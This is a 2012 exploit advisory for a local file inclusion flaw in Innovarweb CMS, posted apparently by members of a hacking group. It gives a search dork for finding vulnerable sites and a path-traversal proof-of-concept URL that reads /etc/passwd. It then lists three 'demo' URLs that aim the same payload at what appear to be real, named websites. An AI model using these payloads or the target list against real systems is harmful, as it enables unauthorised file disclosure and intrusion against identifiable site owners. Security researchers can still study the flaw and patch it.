Innovarweb CMS suffers from a local file inclusion vulnerability.
2b26b51cb0e5d67ff32ec221d94770eb225cc7e960d1829cbf4a695c34eede2c
# Exploit Title: Innovarweb CMS / Local File Inclusion# Date:
31/08/2012# Author: Daniel Godoy# Author
Mail:DanielGodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software web:
http://www.innovarweb.com.ar/interior/index.php?cdo=servicios/gestor_contenidos.php#
Tested on: Linux# Dork: allinurl:"index.php?cdo="
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego,
Incid3nt,Maximiliano Soler,
Pablin77,_tty0,Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha,
zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
http://target/index.php?cdo=../../../../.././etc/passwd
[DEMO]http://www.westingcapitalinc.com/index.php?cdo=./../../../../../etc/passwdhttp://www.areneracolonia.com.ar/interior/index.php?cdo=../../../../../../etc/passwdhttp://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com